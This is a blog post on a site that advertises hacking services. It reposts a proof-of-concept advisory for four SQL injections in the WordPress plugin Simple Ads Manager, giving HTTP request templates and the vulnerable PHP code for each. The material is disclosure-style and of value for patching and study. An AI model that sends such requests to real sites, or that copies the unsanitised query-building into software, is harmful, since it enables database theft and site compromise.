Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863543848

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team


::PROOF OF CONCEPT::

---SQL INJECTION 1---

+ REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL INJECTION HERE>&level=3


- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:

	  case 'sam_ajax_sam_hits':
		  if(isset($_POST['hits']) && is_array($_POST['hits'])) {
			  $hits = $_POST['hits'];
			  $values = '';
			  $remoteAddr = $_SERVER['REMOTE_ADDR'];
			  foreach($hits as $hit) {
				  $values .= ((empty($values)) ? '' : ', ') . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
			  }
			  $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};";
			  $result = $wpdb->query($sql);
			  if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
			  else echo json_encode(array(
				  'success' => false,
				  'result' => $result,
				  'sql' => $sql,
				  'hits' => $hits,
				  'values' => $values
			  ));	
		  }
		  break;


		  
		  
---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
      $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
      $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post';
      $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page';

      //set @row_num = 0;
      //SELECT @row_num := @row_num + 1 AS recid
      $sql = "SELECT
                wp.id,
                wp.post_title AS title,
                wp.post_type AS type
              FROM
                $postTable wp
              WHERE
                wp.post_status = 'publish' AND
                FIND_IN_SET(wp.post_type, 'post,page{$custs}')
              ORDER BY wp.id;";

      $posts = $wpdb->get_results($sql, ARRAY_A);

      $k = 0;
      foreach($posts as &$val) {
        switch($val['type']) {
          case 'post':
            $val['type'] = $sPost;
            break;
          case 'page':
            $val['type'] = $sPage;
            break;
          default:
            $val['type'] = $sPost . ': '.$val['type'];
            break;
        }
        $k++;
        $val['recid'] = $k;
      }
      $out = array(
        'status' => 'success',
        'total' => count($posts),
        'records' => $posts
      );
      break;

	  
	  
---SQL INJECTION 3---
+REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL INJECTION HERE> HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

action=load_combo_data

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+Vulnerable code: from line 225 to 255
    case 'sam_ajax_load_combo_data':
      $page = $_GET['page'];
      $rows = $_GET['rows'];
      $searchTerm = $_GET['searchTerm'];
      $offset = ((int)$page - 1) * (int)$rows;
      $sql = "SELECT
                wu.id,
                wu.display_name AS title,
                wu.user_nicename AS slug,
                wu.user_email AS email
              FROM
                $uTable wu
              WHERE wu.user_nicename LIKE '{$searchTerm}%'
              ORDER BY wu.id
              LIMIT $offset, $rows;";
      $users = $wpdb->get_results($sql, ARRAY_A);
      $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';";
      $rTotal = $wpdb->get_var($sql);
      $total = ceil((int)$rTotal/(int)$rows);
      $out = array(
        'page' => $page,
        'records' => count($users),
        'rows' => $users,
        'total' => $total,
        'offset' => $offset
      );
      break;

	  
	  
	  
---SQL INJECTION 4---

+ REQUEST

POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL INJECTION HERE>&sadmin=<SQL INJECTION HERE>

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php

+ Vulnerable code: from line 188 to 223
    case 'sam_ajax_load_users':
      $roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber';
      $roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor';
      $roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author';
      $roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor';
      $roleAdministrator = (isset($_REQUEST["admin"])) ? urldecode($_REQUEST["admin"]) : 'Administrator';
      $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin';
      $sql = "SELECT
                wu.id,
                wu.display_name AS title,
                wu.user_nicename AS slug,
                (CASE wum.meta_value
                  WHEN 0 THEN '$roleSubscriber'
                  WHEN 1 THEN '$roleContributor'
                  WHEN 2 THEN '$roleAuthor'
                  ELSE
                    IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor',
                      IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator',
                        IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
                      )
                    )
                END) AS role
              FROM $uTable wu
              INNER JOIN $umTable wum
                ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
              ORDER BY wu.id;";
      $users = $wpdb->get_results($sql, ARRAY_A);
      $k = 0;
      foreach($users as &$val) {
        $k++;
        $val['recid'] = $k;
      }
      $out = $users;
      break;